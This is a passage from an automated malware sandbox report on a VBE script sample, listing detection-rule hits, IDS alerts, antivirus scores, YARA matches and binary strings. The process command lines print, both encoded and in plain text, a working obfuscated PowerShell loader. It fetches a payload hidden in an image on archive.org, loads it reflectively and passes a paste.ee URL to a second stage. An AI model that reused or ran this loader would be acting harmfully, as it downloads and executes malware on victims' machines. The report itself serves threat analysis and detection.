NlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFz
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", ProcessId: 7068, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFz
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe", ProcessId: 7068, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFz
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjV
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T10:00:06.037343+020020490381A Network Trojan was detected207.241.227.242443192.168.2.649711TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:59:51.996903+020028554641A Network Trojan was detected192.168.2.64995418.163.12.680TCP
              2024-10-10T09:59:51.996903+020028554641A Network Trojan was detected192.168.2.64995618.163.12.680TCP
              2024-10-10T09:59:51.996903+020028554641A Network Trojan was detected192.168.2.649964188.114.96.380TCP
              2024-10-10T10:01:27.277973+020028554641A Network Trojan was detected192.168.2.64995518.163.12.680TCP
              2024-10-10T10:01:38.034177+020028554641A Network Trojan was detected192.168.2.649958172.96.186.20480TCP
              2024-10-10T10:01:40.545678+020028554641A Network Trojan was detected192.168.2.649959172.96.186.20480TCP
              2024-10-10T10:01:43.452562+020028554641A Network Trojan was detected192.168.2.649960172.96.186.20480TCP
              2024-10-10T10:01:51.319864+020028554641A Network Trojan was detected192.168.2.649963188.114.96.380TCP
              2024-10-10T10:01:56.277471+020028554641A Network Trojan was detected192.168.2.649965188.114.96.380TCP
              2024-10-10T10:02:05.197572+020028554641A Network Trojan was detected192.168.2.6499673.33.130.19080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T10:00:07.219856+020028410751Malware Command and Control Activity Detected192.168.2.649724188.114.96.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgVirustotal: Detection: 8%Perma Link
              Source: 10092024150836 09.10.2024.vbeVirustotal: Detection: 7%Perma Link
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: appidtel.pdb source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
